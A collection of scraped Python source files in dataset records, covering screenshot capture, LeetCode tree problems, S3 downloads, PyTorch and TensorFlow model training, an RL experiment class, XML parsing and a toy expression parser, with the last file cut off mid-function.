+{"seq_id":"493030646","text":"import pyscreenshot as ImageGrab\nimport cv2\nimport os\n\n\ndef capture_custom(box):\n im = ImageGrab.grab(bbox=(box['x1'], box['y1'], box['x2'], box['y2']))\n # save to to file for use with unique name\n filename = \"{}.png\".format(os.getpid())\n im.save(filename, \"PNG\")\n return filename\n\n\ndef grayscale(src):\n img = cv2.imread(src)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # not doing any noise removal or threshold preprocessing\n # it makes results worse in this case\n\n filename = \"{}.png\".format(os.getpid())\n cv2.imwrite(filename, gray)\n return filename\n\n\ndef cleanup(files):\n # clean up files after processing\n for file in files:\n os.remove(file)\n","sub_path":"ImageGrab.py","file_name":"ImageGrab.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"460732488","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/11 ##\n## Description: Leetcode #226 ##\n##############################################\n\n# Invert a binary tree.\n# \n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9\n# to\n# \n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # @param root, TreeNode\n # @return TreeNode\n def invertTree(self, root):\n if root is None:\n return root\n root.left, root.right = root.right, root.left\n self.invertTree(root.left)\n self.invertTree(root.right)\n return root\n \n # @param root, TreeNode\n # @return TreeNode\n def preorderTraversal(self, root, ans):\n if root is None:\n return ans\n ans.append(root.val)\n self.preorderTraversal(root.left, ans)\n self.preorderTraversal(root.right, ans)\n return ans\n\n# Main\nif __name__ == '__main__':\n n0 = TreeNode(4)\n n1 = TreeNode(2)\n n2 = TreeNode(7)\n n3 = TreeNode(1)\n n4 = TreeNode(3)\n n5 = TreeNode(6)\n n6 = TreeNode(9)\n n0.left, n0.right = n1, n2\n n1.left, n1.right = n3, n4\n n2.left, n2.right = n5, n6\n \n print(Solution().preorderTraversal(n0, []))\n newRoot = Solution().invertTree(n0)\n print(Solution().preorderTraversal(newRoot, []))\n","sub_path":"Solutions/226_InvertBinaryTree.py","file_name":"226_InvertBinaryTree.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"649354110","text":"import boto3\nimport botocore\nimport constants as c\nimport tarfile\nimport os\ns3 = boto3.resource('s3')\n\ndef download_data(name, data_dir):\n file_name = '{}.tar.gz'.format(name)\n key = os.path.join(c.DATA_PREFIX,file_name)\n path = os.path.join(data_dir, file_name)\n print(\"Downloading dataset {} to dir {}\".format(name, data_dir))\n try:\n s3.Bucket(c.U6_DATASET_BUCKET).download_file(key, path)\n return path\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n print(\"The object does not exist.\")\n return None\n else:\n raise\n\n\ndef unzip_file(fpath, extraction_path = '.', strip_prefix = True, cleanup=True):\n print(\"Extracting file {}\".format(fpath))\n tar = tarfile.open(fpath)\n prefix = '/tmp' # this prefix is added from the u6 Dataset upload process\n for member in tar.getmembers():\n if strip_prefix:\n member.name = member.name.lstrip(prefix)\n tar.extract(member, extraction_path)\n tar.close()\n if cleanup:\n os.remove(fpath)\n\n\ndef download_and_unzip(name, data_dir):\n fpath = download_data(name, data_dir)\n unzip_file(fpath, data_dir)\n\n \n\n\n\n\n\n\n\n","sub_path":"datasets/download/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"370648736","text":"from ml_model import symcnn_model\nfrom dnn_model import dnn_model\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom create_dataset import Data_gener\nimport torch.autograd as autograd\nimport torch.optim as optim\n\nimport time\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\n\nDEVICE_ID = 0\nTFIDF = False\nBATCH_SIZE = 2048\nEMBEDDING_DIM = 64\nCONV_NUM_KERNEL1 = 700\nCONV_NUM_KERNEL2 = 32\nKERNEL_SIZE2 = 3\nKERNEL_SIZE1 = 5\nFC1_NUM = 128\nFC2_NUM = 64\nFC3_NUM = 32\nSTART_TRAIN_STEPS = 0\nEND_TRAIN_STEPS = 160100\nSTART_AUG_TRAIN_STEPS = 0\nEND_AUG_TRAIN_STEPS = 0\nINIT_LEARNING_RATE1 = 0.0001\nINIT_LEARNING_RATE2 = 0.00001\nTOP_10_HIT_GATE1 = 1.2\nTOP_10_HIT_GATE2 = 3\nINIT_MODEL_NAME = ''#'model-0.5550-pars-2018-05-15-06-56.pkl'\nDEBUG = True\nEXPER_COMMENT = 'continue with augmentation from zero streamline\\n embedding_dim %d\\n conv_num_kernel1 %d\\n kernel_size1 %d\\n conv_num_kernel2 %d\\n kernel_size2 %d\\n \\\nfc1_num %d\\n fc2_num %d\\n fc3_num %d\\n start_train_steps %d\\n end_train_steps %d\\n start_aug_train_steps %d\\n \\\nend_aug_train_steps %d\\n init_learning_rate1 %f\\ninit_learning_rate2 %f\\n init_model_name %s\\n TFIDF %d\\n' \\\n%(EMBEDDING_DIM, CONV_NUM_KERNEL1, KERNEL_SIZE1, CONV_NUM_KERNEL2, KERNEL_SIZE2, FC1_NUM, FC2_NUM, FC3_NUM, START_TRAIN_STEPS, END_TRAIN_STEPS, \\\nSTART_AUG_TRAIN_STEPS, END_AUG_TRAIN_STEPS, INIT_LEARNING_RATE1, INIT_LEARNING_RATE2, INIT_MODEL_NAME, TFIDF)\nINIT_TEST = True and (DEBUG == False) and (START_AUG_TRAIN_STEPS == 0) and (INIT_MODEL_NAME != '')\nprint(EXPER_COMMENT)\n\nexperiment_start_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\nif DEBUG:\n f_log = open('/home/ub102/change_recommend_pytorch/logs/debug.log','w')\n f_log.write('experiment_start_time:\\t'+experiment_start_time+'\\n')\nelse:\n f_experiment_log = open('/home/ub102/change_recommend_pytorch/logs/experiment_directory.log','a')\n f_log = open('/home/ub102/change_recommend_pytorch/logs/exper-%s.log'%experiment_start_time,'w')\n f_experiment_log.write(experiment_start_time+': '+EXPER_COMMENT+'\\n')\n f_experiment_log.close()\n f_log.write('experiment_start_time:\\t'+experiment_start_time+'\\n')\n f_log.write(EXPER_COMMENT+'\\n')\n\ng = Data_gener('wine', batch_size = BATCH_SIZE,TFIDF =TFIDF)\nfile_matrix = g.file_matrix.cuda(DEVICE_ID)\ngg = g.gener('train', augmentation=False)\nga = g.gener('train', augmentation=True)\ncriterion = nn.BCELoss()\nif not TFIDF:\n net = symcnn_model(embedding_dim = EMBEDDING_DIM, conv_num_kernel1 = CONV_NUM_KERNEL1, \\\nfc1_num = FC1_NUM, fc2_num = FC2_NUM, kernel_size1 = KERNEL_SIZE1, kernel_size2 = KERNEL_SIZE2,conv_num_kernel2 = CONV_NUM_KERNEL2).cuda(DEVICE_ID)\n#net.load_state_dict(torch.load('/home/song/change_recommend_pytorch/models/model-pars-first-night.pkl'))\n#net.load_state_dict(torch.load('/home/song/change_recommend_pytorch/models/model-0.8947-pars-2018-04-18-20-21.pkl'))\nelse:\n net = dnn_model(fc1_num = FC1_NUM, fc2_num = FC2_NUM).cuda(DEVICE_ID)\n\nif INIT_MODEL_NAME != '':\n net.load_state_dict(torch.load('/home/ub102/change_recommend_pytorch/models/'+INIT_MODEL_NAME))\n\ndef analysis_result(output, xy, label, loss, hit = False):\n mse_loss = float(loss.data)\n y_numpy = output.cpu().data.numpy().squeeze()\n y_around = np.around(y_numpy).astype('int64')\n label_np = label.cpu().numpy().squeeze().astype('int64')\n acc = (np.dot(y_around, label_np)+np.dot(1-y_around, 1-label_np))/BATCH_SIZE\n auc = roc_auc_score(label_np, y_numpy)\n report_str = 'mse_loss: %.5f, acc: %.3f, auc: %.3f'%(mse_loss,acc,auc)\n if hit == True:\n sorted_ix = sorted(range(y_numpy.shape[0]), key = lambda x:y_numpy[x], reverse = True)\n hits_info = list(map(lambda x:label_np[x], sorted_ix))\n top_10_hit, top_10_hit_num = 1 if sum(hits_info[:10]) > 0 else 0, sum(hits_info[:10])\n top_5_hit, top_5_hit_num = 1 if sum(hits_info[:5]) > 0 else 0, sum(hits_info[:5])\n top_3_hit, top_3_hit_num = 1 if sum(hits_info[:3]) > 0 else 0, sum(hits_info[:3])\n top_1_hit, top_1_hit_num = 1 if sum(hits_info[:1]) > 0 else 0, sum(hits_info[:1])\n hits_info_sum = [hits_info[0]]+[0 for i in range(1,len(hits_info))]\n for i in range(1,len(hits_info)):\n hits_info_sum[i] = hits_info_sum[i-1] + hits_info[i]\n ap = np.dot(np.array([hits_info_sum[i]/(i+1) for i in range(min(100,len(hits_info)))]),np.array(hits_info[:100]))/sum(hits_info)\n return [report_str, mse_loss, acc, auc, [top_10_hit, top_5_hit, top_3_hit, top_1_hit], [top_10_hit_num, top_5_hit_num, top_3_hit_num, top_1_hit_num], ap]\n else: \n return [report_str, mse_loss, acc, auc]\n\ngt = g.gener('test')\nxy_t = next(gt)\nx_t = [autograd.Variable(file_matrix[i]) for i in xy_t[:2]]\nlabel_t = xy_t[2].cuda(DEVICE_ID) \ntarget_t = autograd.Variable(label_t)\n\ndef validation(val_interv):\n test_commits_size = len(g.test_commits)\n #test_commits_size = 200\n top_10_hits, top_5_hits = [[] for ix in val_interv], [[] for ix in val_interv]\n top_3_hits, top_1_hits = [[] for ix in val_interv], [[] for ix in val_interv]\n mse_losses, acces, auces = [[] for ix in val_interv], [[] for ix in val_interv], [[] for ix in val_interv]\n aps = [[] for ix in val_interv]\n for commit_ix in val_interv:\n if commit_ix%500 == 0 and commit_ix>0:\n print('test commit id:',commit_ix)\n for file_ix in range(len(g.test_commits[commit_ix][0])):\n left_samples, right_samples, label_samples = g.commit_validation_generation(commit_ix, file_ix)\n x = [autograd.Variable(file_matrix[i]) for i in [left_samples, right_samples]]\n label = label_samples.cuda(DEVICE_ID)\n output = net(x)\n target = autograd.Variable(label)\n loss = criterion(output, target)\n\n report_str, mse_loss, acc, auc, \\\n [top_10_hit, top_5_hit, top_3_hit, top_1_hit], \\\n [top_10_hit_num, top_5_hit_num, top_3_hit_num, top_1_hit_num], ap \\\n = analysis_result(output, [left_samples, right_samples, label_samples], label, loss, hit = True)\n top_10_hits[commit_ix-val_interv[0]].append(top_10_hit)\n top_5_hits[commit_ix-val_interv[0]].append(top_5_hit)\n top_3_hits[commit_ix-val_interv[0]].append(top_3_hit)\n top_1_hits[commit_ix-val_interv[0]].append(top_1_hit)\n mse_losses[commit_ix-val_interv[0]].append(mse_loss)\n acces[commit_ix-val_interv[0]].append(acc)\n auces[commit_ix-val_interv[0]].append(auc)\n aps[commit_ix-val_interv[0]].append(ap)\n top_10_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_10_hits)) )\n top_5_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_5_hits)) )\n top_3_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_3_hits)) )\n top_1_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_1_hits)) )\n acc = np.mean( list(map(lambda x:sum(x)/len(x), acces)) )\n auc = np.mean( list(map(lambda x:sum(x)/len(x), auces)) )\n mean_ap = np.mean( list(map(lambda x:sum(x)/len(x), aps)))\n mse_loss = np.mean( list(map(lambda x:sum(x)/len(x), mse_losses)) )\n validation_report = ''\n validation_report += 'top_10_hit:\\t%.4f\\n'%(top_10_hit)\n validation_report += 'top_5_hit:\\t%.4f\\n'%(top_5_hit)\n validation_report += 'top_3_hit:\\t%.4f\\n'%(top_3_hit)\n validation_report += 'top_1_hit:\\t%.4f\\n'%(top_1_hit)\n validation_report += 'acc:\\t%.4f\\n'%(acc)\n validation_report += 'auc:\\t%.4f\\n'%(auc)\n validation_report += 'mean_ap:\\t%.4f\\n'%(mean_ap)\n validation_report += 'mse_losses:\\t%.4f\\n'%(mse_loss)\n short_report = 'top_10_hit: %.4f, top_5_hit: %.4f, top_3_hit: %.4f, top_1_hit: %.4f,mean_ap: %.4f, auc: %.4f'%(top_10_hit, top_5_hit, top_3_hit, top_1_hit, mean_ap, auc)\n return [validation_report, top_10_hit, top_5_hit, top_3_hit, top_1_hit, acc, auc, mse_loss, short_report, top_10_hits, top_5_hits, top_3_hits, top_1_hits]\n\nif INIT_TEST:\n print('init test')\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n print(val_report)\n\n\ndef train_with_gener(gener,cnt, optim, top_10_hit_gate):\n xy = next(gener)\n x = [autograd.Variable(file_matrix[i]) for i in xy[:2]]\n label = xy[2].cuda(DEVICE_ID)\n\n output = net(x)\n target = autograd.Variable(label)\n loss = criterion(output, target)\n \n if cnt%100 == 0:\n output_t = net(x_t)\n loss_t = criterion(output_t, target_t)\n val_analysis = validation(range(10))\n short_report = val_analysis[8]\n top_10_hit = val_analysis[1]\n temple_report = '%05d: '%(cnt)+ analysis_result(output, xy, label, loss)[0] +'\\t validation:\\t' + short_report\n print(temple_report)\n f_log.write(temple_report + '\\n')\n if top_10_hit >= top_10_hit_gate:\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n top_10_hit = val_report_data[1]\n print(val_report)\n cur_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\n torch.save(net, '/home/ub102/change_recommend_pytorch/models/model-%.4f-%s.pkl'%(top_10_hit, cur_time)) \n torch.save(net.state_dict(), '/home/ub102/change_recommend_pytorch/models/model-%.4f-pars-%s.pkl'%(top_10_hit, cur_time))\n print('model_saved')\n return False\n if cnt%5000 == 0 and cnt > 0:\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n top_10_hit = val_report_data[1]\n cur_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\n torch.save(net, '/home/ub102/change_recommend_pytorch/models/model-%.4f-%s.pkl'%(top_10_hit, cur_time)) \n torch.save(net.state_dict(), '/home/ub102/change_recommend_pytorch/models/model-%.4f-pars-%s.pkl'%(top_10_hit, cur_time))\n f_log.write('model saved:\\t%s\\n'%cur_time)\n f_log.write(val_report)\n print(val_report)\n loss.backward()\n optim.step()\n return False\n\nfrom time import time\nt1 =time()\nval_report_data = validation(range(10))\nt2 =time()\nprint('use time %f'%t2-t1)\nprint('num of inference %d'%(sum(map(len(c[0]) for c in g.test_commits[10]))))\n\n'''\noptimizer = optim.RMSprop(net.parameters(), lr=INIT_LEARNING_RATE1)\nfor cnt in range(START_TRAIN_STEPS,END_TRAIN_STEPS):\n if train_with_gener(gg, cnt, optimizer, TOP_10_HIT_GATE1):\n break\noptimizer = optim.RMSprop(net.parameters(), lr=INIT_LEARNING_RATE2)\nfor cnt in range(START_AUG_TRAIN_STEPS, END_AUG_TRAIN_STEPS):\n if train_with_gener(ga, cnt, optimizer, TOP_10_HIT_GATE2):\n break\n'''\n#val_report = validation()[0]\n#f_log.write(val_report)\nexperiment_end_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\nf_log.write('experiment_end_time:\\t'+experiment_end_time+'\\n')\nf_log.close()\n\n#for i in range(6):\n# print(times[i,:].sum())\n","sub_path":"gpu_train_torch_model.py","file_name":"gpu_train_torch_model.py","file_ext":"py","file_size_in_byte":11005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"237434973","text":"# https://leetcode-cn.com/problems/maximum-depth-of-binary-tree/\n\nclass Solution:\n def maxDepth(self, root: TreeNode) -> int:\n '''DFS'''\n # def dfs(root, level):\n # if not root: return level\n # left = dfs(root.left, level+1)\n # right = dfs(root.right, level+1)\n # return max(left, right)\n # return dfs(root, 0)\n '''BFS'''\n if not root: return 0\n q = collections.deque([root])\n level = 0\n while q:\n for i in range(len(q)):\n node = q.popleft()\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n level += 1\n return level","sub_path":"Week_03/104. 二叉树的最大深度.py","file_name":"104. 二叉树的最大深度.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"133297936","text":"#\n# Copyright (C) 2019 Luca Pasqualini\n# University of Siena - Artificial Intelligence Laboratory - SAILab\n#\n#\n# USienaRL is licensed under a BSD 3-Clause.\n#\n# You should have received a copy of the license along with this\n# work. If not, see .\n\n# Import packages\n\nimport logging\n\n# Import usienarl\n\nfrom usienarl import Experiment, Environment, Agent, Interface\n\n\nclass BenchmarkExperiment(Experiment):\n \"\"\"\n Benchmark experiment for OpenAI gym environments.\n\n It only uses a validation threshold to both validate and test. If validation is passed, the experiment is considered\n automatically successful.\n \"\"\"\n\n def __init__(self,\n name: str,\n validation_threshold: float,\n environment: Environment,\n agent: Agent,\n interface: Interface = None):\n # Generate the base experiment\n super(BenchmarkExperiment, self).__init__(name, environment, agent, interface)\n # Define internal attributes\n self._validation_threshold: float = validation_threshold\n\n def _is_validated(self,\n logger: logging.Logger) -> bool:\n # Check if average validation reward (score) is over validation threshold\n if self.validation_volley.avg_total_reward >= self._validation_threshold:\n return True\n return False\n\n def _is_successful(self,\n logger: logging.Logger) -> bool:\n # Check if validated\n return self.validated\n","sub_path":"benchmarks/src/benchmark_experiment.py","file_name":"benchmark_experiment.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"334757756","text":"import re\nimport math\n\n# KEY FORMAT:\n# Input -> Expression class -> Terms information -> Evaluate -> Expression class compacts expression -> repeat until result.\n\nclass Expression:\n # The Expression class will handle the markup of a string into\n # nested parenthesis, contain values during calculation,\n # and will attempt to create an ideal order for the \n # math system to calculate things.\n def __init__(self,string):\n self.original = string\n self.list = []\n self.Nests()\n print(self.list)\n self.values = []\n self.getValues()\n \n def Nests(self):\n # Tiers nests, also handles the remainder.\n nestStarts = 0 # Starts both at 0\n nestEnds = 0\n tmp = \"\"\n if self.original.count(\"(\")!=self.original.count(\")\"):\n raise SyntaxError(\"Inconsistent Parenthesis count. Did you make sure to close ALL parentheses?\")\n for char in self.original: # Character by Character detection :)\n if char==\"(\":\n if tmp!=\"\":\n self.list.append(tmp)\n tmp = \"\"\n nestStarts+=1\n self.list.append(\">\"+str(nestStarts))\n elif char==\")\":\n if tmp!=\"\":\n self.list.append(tmp)\n tmp = \"\"\n nestEnds = nestStarts\n self.list.append(\"<\"+str(nestEnds))\n nestEnds-=1 # Suggests completion of a tier, therefore backs out a tier.\n nestStarts-=1\n else:\n tmp+=char\n # PHEW!\n def modifyNests(self,newText, position):\n # Keep in mind that this will only replace one thing at a time.\n self.list[position] = newText\n \n def removeNests(self,tier,replacedValue,subbedValue):\n # Will remove nest levels if evaluation is finished within that level\n # Call this ONCE per replaced and subbed value.\n tmplist = []\n possibilities = \"<\"+str(tier)+\">\"+str(tier)\n for x in range (0,len(self.list)-1):\n if self.list[x] not in possibilities:\n if self.list[x]==replacedValue:\n tmplist.append(subbedValue)\n else: \n tmplist.append(self.list[x])\n self.list = tmplist\n\n \n def recombineNests(self):\n # Given that after modifying the nests the strings will be cut up\n # into tiny pieces, this method will glue them all together.\n tmp = \"\"\n tmplist = []\n for x in range (0, len(self.list-1)):\n paren = re.search(\"[<>]\",self.list[x])!=None # True if there are parenthesis indicators\n if not paren:\n tmp+=x\n if paren:\n tmplist.append(tmp)\n tmplist.append(self.list[x])\n tmp = \"\"\n self.list = (tmplist)\n \n def getValues(self):\n # This will return the actual, non-parenthesis strings.\n tmp = []\n for x in self.list:\n if len(re.findall(\"[()]\",x))==0:\n tmp.append(x)\n self.values = tmp\n \n\n \n \n\n \n\ne = Expression(\"(((a + b))(()))\")\ne.modifyNests(\"b\",3)\nprint(e.list)\n\n\nclass Evaluate:\n def __init__(self,in1,in2,operand):\n self.in1 = float(in1)\n self.in2 = float(in2)\n self.operand = operand\n self.result = autoMath()\n self.struct = {\"in1\": self.in1,\"in2\": self.in2,\"operand\": self.operand, \"result\": self.result}\n \n def autoMath(self):\n if self.operand==\"+\":\n return self.in1+self.in2\n if self.operand==\"-\":\n return self.in1-self.in2\n if self.operand==\"/\":\n return self.in1/self.in2\n if self.operand==\"*\":\n return self.in1*self.in2\n if self.operand==\"^\":\n return math.pow(in1,in2)\n else:\n return None\n \n def __str__(self):\n return str(self.struct)\n \n def value(self):\n return self.result\n\n\n\nclass Information:\n # The Information class will provide information for the basicOperands\n # class to regarding the arguments, the desired operation.\n def __init__(self,string):\n self.original = string\n if self.original==\"\":\n raise Exception(\"InputError: Invalid input\")\n self.ops = [\"*\",\"/\",\"+\",\"-\",\"^\"]\n if self.isSplitExpression(None):\n self.splitExp = self.splitExpression(None)\n self.original = self.splitExp[0]\n else:\n self.splitExp = None\n self.operators = self.getOp(None)\n self.arguments = self.getTerms(None)\n self.chain = self.getChain(None)\n \n self.struct = {\"original\":self.original,\"ops\": self.operators, \"args\": self.arguments,\"chain\": self.chain,\"split_expression\": self.splitExp}\n \n def getOp(self, string):\n # Figures out if operators are a thing. \n # TODO: Make operator regex set a variable?\n if string==None:\n string = self.original\n return re.findall(\"[+,\\-,*,/,^]\",string)\n \n def isSplitExpression(self,string):\n # Figures out if the expression needs to be split. \n # TODO: Offload to the actual Expression class?\n if string==None:\n string = self.original\n if len(string)>3:\n return True\n else:\n return False\n \n def splitExpression(self,string):\n # TODO: Offload to the actual Expression class?\n ret = []\n if string==None:\n string = self.original\n ret.append(string[0:3])\n new = string[3:len(string)]\n while new!=\"\":\n ret.append(new[0:2])\n new = new[2:len(new)]\n return ret\n \n def getTerms(self, string):\n if string==None:\n string = self.original\n return re.findall(\"\\w\",string)\n \n def getChain(self, string):\n if string==None:\n string = self.original\n return re.findall(\"[+,\\-,*,/]|\\w\",string)\n def __str__(self):\n return str(self.struct)\n \n\ndef parse(string):\n final = []\n p = re.split(\"[()]\",string)\n for x in range (0,len(p)):\n if p[x]!=\"\":\n final.append(Information(p[x]))\n for x in final:\n print(str(x))\n print(p)\n \ndef interpreter(Information):\n data = Information.struct\n\n\n\n# parse(\"x+3+5+9\")","sub_path":"mathparser.py","file_name":"mathparser.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"104715555","text":"import xml.etree.ElementTree as ET\n\ntree = ET.parse('planets.xml')\nroot = tree.getroot()\n\nfor child in root:\n print(child.tag, child.attrib)\n for grandchild in child:\n \tprint('\\t', grandchild.tag, grandchild.attrib)\n \tfor grandgrandchild in grandchild:\n \t\tprint('\\t\\t', grandgrandchild.tag, grandgrandchild.attrib)","sub_path":"planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17672268","text":"from __future__ import absolute_import, division, print_function\n\nimport math\nimport os\nimport sys\nimport numpy as np\nimport scipy.misc\nimport tensorflow as tf\nfrom scipy.misc import imsave\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom util.dataset import make_dataset\nfrom util.metrics import cluster_acc, cluster_nmi\n\n#from deconv import deconv2d\nimport math\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom sklearn.mixture import GaussianMixture\n\nflags = tf.flags\nlogging = tf.logging\nlogging.set_verbosity(tf.logging.ERROR)\n\nflags.DEFINE_integer(\"batch_size\", 100, \"batch size\") #128\nflags.DEFINE_integer(\"updates_per_epoch\", 600, \"number of updates per epoch\") #1000\nflags.DEFINE_integer(\"max_epoch\", 1000, \"max epoch\") #100\nflags.DEFINE_float(\"learning_rate\", 0.01, \"learning rate\")\nflags.DEFINE_string(\"working_directory\", \"\", \"\")\nflags.DEFINE_string(\"logdir\", \"\", \"dir for tensorboard logs\")\nflags.DEFINE_integer(\"hidden_size\", 50, \"size of the hidden VAE unit\")\nflags.DEFINE_integer(\"T\", 10, \"level of truncation\")\nflags.DEFINE_float(\"lam\", 1.0, \"weight of the regularizer\")\nflags.DEFINE_integer(\"s\", 100, \"number of samples for testing\")\nFLAGS = flags.FLAGS\n\ndef variable_summaries(var):\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\ndef _weight_variable(name, shape):\n return tf.get_variable(name, shape, tf.float32, tf.random_normal_initializer(stddev=0.001))\n\ndef _bias_variable(name, shape):\n return tf.get_variable(name, shape, tf.float32, tf.constant_initializer(0.0, dtype=tf.float32))\n\ndef encoder(input_tensor):\n W_fc1 = _weight_variable('W_1', [784, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, FLAGS.hidden_size * 2])\n b_fc2 = _bias_variable('b_2', [FLAGS.hidden_size * 2])\n x_attributes = tf.matmul(tf.nn.relu(tf.matmul(input_tensor, W_fc1) + b_fc1), W_fc2) + b_fc2\n mean_x = x_attributes[:, :FLAGS.hidden_size]\n logcov_x = x_attributes[:, FLAGS.hidden_size:]\n return mean_x, logcov_x\n\ndef decoder(mean=None, logcov=None, s=None):\n stddev = tf.sqrt(tf.exp(logcov))\n if s is None:\n epsilon = tf.random_normal([FLAGS.batch_size, FLAGS.hidden_size])\n input_sample = mean + epsilon * stddev\n else:\n epsilon = tf.random_normal([s, FLAGS.batch_size, FLAGS.hidden_size])\n # q_x = tf.exp(-0.5 * tf.reduce_sum(tf.square(epsilon), 2))\n input_sample = tf.expand_dims(mean, 0) + epsilon * tf.expand_dims(stddev, 0)\n input_sample = tf.reshape(input_sample, [-1, FLAGS.hidden_size])\n W_fc1 = _weight_variable('W_1', [FLAGS.hidden_size, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, 784])\n b_fc2 = _bias_variable('b_2', [784])\n return tf.nn.sigmoid(tf.matmul(tf.nn.relu(tf.matmul(input_sample, W_fc1) + b_fc1), W_fc2) + b_fc2), input_sample, epsilon\n\ndef sample(qeta_mu, sigma_px):\n epsilon = tf.random_normal([FLAGS.T, int(FLAGS.batch_size / FLAGS.T), FLAGS.hidden_size])\n means = tf.expand_dims(tf.transpose(qeta_mu), 1)\n covs = tf.expand_dims(tf.transpose(sigma_px), 1)\n input_sample = tf.reshape(epsilon * covs + means, [-1, FLAGS.hidden_size])\n W_fc1 = _weight_variable('W_1', [FLAGS.hidden_size, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, 784])\n b_fc2 = _bias_variable('b_2', [784])\n return tf.reshape(tf.nn.sigmoid(tf.matmul(tf.nn.relu(tf.matmul(input_sample, W_fc1) + b_fc1), W_fc2) + b_fc2), [FLAGS.T, int(FLAGS.batch_size / FLAGS.T), 784])\n\ndef get_reconstruction_cost(output_tensor, target_tensor, epsilon=1e-8):\n return tf.reduce_sum(-target_tensor * tf.log(output_tensor + epsilon) -\n (1.0 - target_tensor) * tf.log(1.0 - output_tensor + epsilon))\n\ndef kl_Beta(alpha, beta, alpha_0, beta_0):\n return tf.reduce_sum(tf.lgamma(alpha_0) + tf.lgamma(beta_0) - tf.lgamma(alpha_0+beta_0)\n + tf.lgamma(alpha + beta) - tf.lgamma(alpha) - tf.lgamma(beta)\n + (alpha - alpha_0) * tf.digamma(alpha) + (beta - beta_0) * tf.digamma(beta)\n - (alpha + beta - alpha_0 - beta_0) * tf.digamma(alpha + beta))\n\ndef get_qv_reg_loss(alpha, beta, alpha_0, beta_0):\n # get the q(v|Y) loss E_q log \\frac{q(v|alpha, beta)}{q(v|Y)}\n return kl_Beta(alpha, beta, alpha_0, beta_0)\n\ndef get_qeta_reg_loss(mu, sigma):\n # get the q(\\eta|Y) reg loss E_q log \\frac{q(\\eta|\\mu_0, \\sigma_0^2)}{q(\\eta | Y)}\n mu_0 = tf.zeros([FLAGS.hidden_size, 1]) #parameters of p(\\eta) ~ N(mu_0, sigma_0^2 I)\n sigma_0 = 100.0 # set a big variance so that the parameters will be learned from data\n return -0.5 * tf.reduce_sum(1 + 2 * tf.log(sigma / sigma_0)\n - tf.square(sigma) / tf.square(sigma_0)\n - tf.square(mu - mu_0) / tf.square(sigma_0))\n\ndef get_S_loss_hao(mean_x, logcov_x, qv_alpha, qv_beta, qeta_mu, qeta_sigma, sigma_px, epsilon = 1e-8):\n S1 = tf.digamma(qv_alpha) - tf.digamma(qv_alpha + qv_beta) \n S2 = tf.cumsum(tf.digamma(qv_beta) - tf.digamma(qv_alpha + qv_beta))\n\n mean_x_expand = tf.expand_dims(mean_x, 1)\n logcov_x_expand = tf.expand_dims(logcov_x, 1)\n qeta_mu_expand = tf.expand_dims(tf.transpose(qeta_mu), 0)\n qeta_sigma_expand = tf.expand_dims(tf.transpose(qeta_sigma), 0)\n sigma_px_expand = tf.expand_dims(tf.transpose(sigma_px), 0)\n S3 = 0.5 * tf.reduce_sum(1 + logcov_x_expand - 2 * tf.log(sigma_px_expand) \\\n - (tf.exp(logcov_x_expand) + tf.square(qeta_sigma_expand) \\\n + tf.square(mean_x_expand - qeta_mu_expand)) / tf.square(sigma_px_expand), 2)\n S = S3 + tf.concat(0, [S1, [0.0]]) + tf.concat(0, [[0.0], S2])\n # get the variational distribution q(z)\n S_max = tf.reduce_max(S, reduction_indices=1)\n 